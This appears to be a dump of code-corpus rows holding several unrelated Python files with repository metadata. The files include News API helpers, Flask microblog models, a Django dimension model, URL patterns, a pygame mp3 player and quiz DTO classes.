    sources_url = "https://newsapi.org/v2/sources?apiKey={}".format(api_key)
    with urllib.request.urlopen(sources_url) as url:
        search_sources_data = url.read()
    search_sources_response = json.loads(search_sources_data)
    search_sources_results = None
    if search_sources_response["sources"]:
        search_sources_list = search_sources_response["sources"]
        search_sources_results = process_sources(search_sources_list)
    return search_sources_results
def process_results(news_list):
    """Transform raw article dicts from the News API into News objects.

    Articles without an image url are skipped.

    :param news_list: list of article dicts as returned by the News API
    :return: list of News objects
    """
    news_results = []
    for item in news_list:
        if not item.get("urlToImage"):
            continue  # skip articles without an image
        news_results.append(News(
            item.get("author"),
            item.get("title"),
            item.get("description"),
            item.get("url"),
            item.get("urlToImage"),
            item.get("content"),
        ))
    return news_results
def process_sources(sources_list):
    """Transform raw source dicts from the News API into Sources objects.

    Sources without a homepage url are skipped.

    :param sources_list: list of source dicts as returned by the News API
    :return: list of Sources objects
    """
    sources_results = []
    for item in sources_list:
        if not item.get("url"):
            continue  # skip sources without a homepage url
        sources_results.append(Sources(
            item.get("id"),
            item.get("name"),
            item.get("description"),
            item.get("url"),
            item.get("category"),
        ))
    return sources_results
"noreply@github.com"
] | noreply@github.com |
46faef68d9ce77da1132f09cf8c57f06fac2e31d | 0380b1062081604e2edf18efccc86bab14cb7705 | /test/models.py | 52ccd0ce12fb2033278ee4ea6bc202eff331dba1 | [] | no_license | Demch1k/microblog | acdb5f751bbf089122e1a124f9850e95e7fab9db | fd5beb95cc03ff2db44bd055e045d2ad5d01a454 | refs/heads/master | 2020-04-17T03:37:37.632063 | 2019-01-24T05:29:09 | 2019-01-24T05:29:09 | 165,824,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,509 | py | from datetime import datetime
from test import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from test import login
from hashlib import md5
class User(UserMixin, db.Model):
    """Application user: login credentials, profile info and authored posts."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(64), index=True, unique=True)
    email = db.Column(db.String(120), index=True, unique=True)
    # Werkzeug hash of the password; the plain password is never stored.
    password_hash = db.Column(db.String(128))
    posts = db.relationship('Post', backref='author', lazy='dynamic')
    about_me = db.Column(db.String(140))
    last_seen = db.Column(db.DateTime, default=datetime.utcnow)

    def __repr__(self):
        """Debug representation, e.g. ``<User susan>``."""
        return '<User {}>'.format(self.username)

    def set_password(self, password):
        """Hash *password* and store only the hash on the user."""
        self.password_hash = generate_password_hash(password)

    def check_password(self, password):
        """Return True when *password* matches the stored hash."""
        return check_password_hash(self.password_hash, password)

    def avatar(self, size):
        """Gravatar URL for this user's email at *size* pixels, falling
        back to a generated 'identicon' when no Gravatar exists."""
        digest = md5(self.email.lower().encode('utf-8')).hexdigest()
        return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
            digest, size)
class Post(db.Model):
    """Blog post authored by a User."""
    id = db.Column(db.Integer, primary_key=True)
    body = db.Column(db.String(140))
    # UTC timestamp; the function (not utcnow()) is passed so it is
    # evaluated at insert time, not at class-definition time.
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))

    def __repr__(self):
        """Debug representation showing the post body."""
        return '<Post {}>'.format(self.body)
@login.user_loader
def load_user(id):
    """Flask-Login user loader: resolve the session's stored user id to a
    User row (None when the id no longer exists)."""
    # Removed stray '| [' residue that had been fused onto the return line,
    # which made the statement a syntax error.
    return User.query.get(int(id))
"demch1k.mid@gmail.com"
] | demch1k.mid@gmail.com |
4a8839c76e364ce097ae40ad6f248bb84cc4d8ef | 7bcb0b7f721c8fa31da7574f13ed0056127715b3 | /src/apps/base/models/dimensions/dimension_client.py | 666ebe39af5dc08ced900d20257b4276f2e8c9ce | [] | no_license | simonchapman1986/ripe | 09eb9452ea16730c105c452eefb6a6791c1b4a69 | c129da2249b5f75015f528e4056e9a2957b7d884 | refs/heads/master | 2022-07-22T05:15:38.485619 | 2016-01-15T12:53:43 | 2016-01-15T12:53:43 | 49,718,671 | 1 | 0 | null | 2022-07-07T22:50:50 | 2016-01-15T12:53:09 | Python | UTF-8 | Python | false | false | 1,358 | py | from django.db import models
from django_extensions.db.fields import UUIDField
from apps.base.models.dimensions.dimension import select_or_insert
from apps.flags.checks.client import client
class DimensionClient(models.Model):
    """
    DimensionClient
    Dim to filter down on clients within the reported data facts
    Although this is merely a dim within the system, we have a flag set to this dim.
    The reason for this is because we ingest clients. If we are receiving events for a client that does not yet
    exist in the clients table, something is going awry, either the ingested data, or one of our events is failing
    to ingest as it should.
    The 'client' flag simply checks the client table upon insertion, if the client does exist, we are ok and no
    flag is required. However if it does not yet exist, there may be an issue so a DoesNotExist flag is raised.
    Regardless of the flag outcome we always store the client dim, we cannot ignore the data we receive.
    """
    client_id = UUIDField(version=4, unique=True)

    class Meta:
        app_label = 'base'
        db_table = 'dim_client'

    @classmethod
    def insert(cls, **kwargs):
        """Run the 'client' flag check, then store (or fetch) the dim row.

        :param kwargs: lookup values, expected to include ``client_id``
        :return: result of ``select_or_insert`` for this model
        """
        cid = kwargs.get('client_id', False)
        # NOTE(review): the default is False but the guard compares to -1,
        # so a *missing* client_id still triggers the flag check — confirm
        # that -1 is the intended "skip the check" sentinel.
        if cid != -1:
            client(client_id=cid, event_name='insert')
        # Always store the dim regardless of the flag outcome (see docstring).
        return select_or_insert(cls, values={}, **kwargs)
| [
"simon-ch@moving-picture.com"
] | simon-ch@moving-picture.com |
497873aaf13583eda297f97fa3f2d5ce489102fd | 2d7a6c084e55e52ca11378211b2cdea06a7fefa8 | /ex021.py | 9d6f73e75441d8561470e1ff80efad0e8dde34f0 | [] | no_license | 21lucasmessias/CursoEmVideo-Python | 2e0203aae33c1360c833e7c8f9c0b4cf861098ae | c05145e60a06ab959dbd0490239b12523ecd1c2a | refs/heads/master | 2020-07-04T19:46:24.783471 | 2019-08-14T17:16:02 | 2019-08-14T17:16:02 | 202,394,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | from pygame import mixer
mixer.init()  # initialise the pygame audio mixer
mixer.music.load('ex021.mp3')  # load the mp3 from the working directory
mixer.music.play()  # start playback (returns immediately, plays in background)
input('Listening')  # block until Enter so the script keeps playing
| [
"noreply@github.com"
] | noreply@github.com |
d8ea407d41b9cb81401a2718e854ebdd703c93a0 | d51bed0d1f7917e05dc62e867f64035bfe875c04 | /virt_env/bin/flask | 880af2eab7944e502bab708436a16787f5f08e68 | [] | no_license | JQuelen/cse312-project | 0aae924fc4eca0dc38e79da74b406fa9ff9592be | e5268352b5593438f54a816fcad1b51704c8cec6 | refs/heads/main | 2023-04-15T02:41:33.066088 | 2021-05-08T02:06:11 | 2021-05-08T02:06:11 | 341,030,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/home/ren/school/312/cse312-project/virt_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"cantopra@buffalo.edu"
] | cantopra@buffalo.edu | |
8a431fd0e791b2f697b2f302884856a63fedaacd | cb6e6e9c310f3bc8ea7fa0b07c955b0b99693f80 | /nadb/urls.py | a6c37398c650db7ab0fe01db2e94f067f3829ec5 | [] | no_license | MechanisM/django-nadb | b9404926540473900b354b2d27e1cda75cdfc3c6 | b97ada6fedff7c9ba7994d6742a17979a939da71 | refs/heads/master | 2020-12-25T04:46:35.152055 | 2012-03-27T01:39:39 | 2012-03-27T01:39:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | """
URL patterns for django-nadb.
Simply use a line like this in your root URLConf to set up the default
URLs for django-nadb:
(r'^blog/', include('nadb.urls')),
Including these URLs (via the ``include()`` directive) will set up the
following patterns based on whatever URL prefix they are included
under:
* Posts list at ``/``.
* Post detail at ``/<year>/<month>/<day>/<slug>``.
* Archive for a day at ``/<year>/<month>/<day>``.
* Archive for a month at ``/<year>/<month>``.
* Archive for a year at ``/<year>``.
* Categories list at ``/categories``.
* Category detail at ``/categories/<slug>``.
"""
from django.conf.urls.defaults import patterns, include, url
# URL table mapping the patterns documented in the module docstring to the
# view functions in nadb.views. Note: day archives must be declared before
# month/year archives so the longer paths match first.
urlpatterns = patterns('nadb.views',
    # /<year>/<month>/<day>/<slug>/ — single post detail
    url(r'^(?P<year>\d{4})/(?P<month>\w{3})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/$',
        view='post_detail',
        name='post_detail'
    ),
    # /<year>/<month>/<day>/ — archive for one day
    url(r'^(?P<year>\d{4})/(?P<month>\w{3})/(?P<day>\d{1,2})/$',
        view='post_archive_day',
        name='post_archive_day'
    ),
    # /<year>/<month>/ — archive for one month (3-letter month name)
    url(r'^(?P<year>\d{4})/(?P<month>\w{3})/$',
        view='post_archive_month',
        name='post_archive_month'
    ),
    # /<year>/ — archive for one year
    url(r'^(?P<year>\d{4})/$',
        view='post_archive_year',
        name='post_archive_year'
    ),
    # /categories/<slug>/ — posts in one category
    url(r'^categories/(?P<slug>[-\w]+)/$',
        view='category_detail',
        name='category_detail'
    ),
    # /categories/ — list of all categories
    url(r'^categories/$',
        view='category_list',
        name='category_list'
    ),
    # / — posts list (site index for this app)
    url(r'^$',
        view='post_list',
        name='post_list'
    ),
)
| [
"earonne@gmail.com"
] | earonne@gmail.com |
7df42e2ac65b41410913aeea15f66a7ecc66569b | 772d1ab6a1814e4b6a408ee39865c664563541a6 | /lms_app/lms_dto/QuestionDto.py | 8b8efd36df53eb095889030e90c1f10efc0d854d | [] | no_license | omitogunjesufemi/lms | 7deed8bf54799034d6af2b379a0c56801f5645cc | 9c8bb88556a3f5598cf555623ef016a74ae3f5c7 | refs/heads/master | 2023-05-04T12:52:13.862572 | 2021-05-25T13:48:26 | 2021-05-25T13:48:26 | 330,643,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | class SetQuestionDto:
question_title: str
question_content: str
choice1: str
choice2: str
choice3: str
choice4: str
answer: str
assigned_mark: int
assessment_id: int
id: int
class UpdateQuestionDto:
    """Payload for updating an existing question (no assessment_id: the
    question's assessment is not changed by an update).

    Note: these class-level annotations only declare the expected
    attributes; values are assigned per instance by the caller.
    """
    question_title: str
    question_content: str
    choice1: str
    choice2: str
    choice3: str
    choice4: str
    answer: str
    assigned_mark: int
    id: int
class ListQuestionDto:
    """Read DTO for question list entries, including the assessment id.

    Note: these class-level annotations only declare the expected
    attributes; values are assigned per instance by the caller.
    """
    question_title: str
    assigned_mark: int
    assessment_id: int
    question_content: str
    choice1: str
    choice2: str
    choice3: str
    choice4: str
    answer: str
    id: int
class GetQuestionDto:
    """Read DTO for a single question, including its assessment id.

    Note: these class-level annotations only declare the expected
    attributes; values are assigned per instance by the caller.
    """
    # Removed stray '| [' residue fused onto the final annotation, which
    # made the class body a syntax error.
    question_title: str
    question_content: str
    choice1: str
    choice2: str
    choice3: str
    choice4: str
    answer: str
    assigned_mark: int
    assessment_id: int
    id: int
"omitogunopeyemi@gmail.com"
] | omitogunopeyemi@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.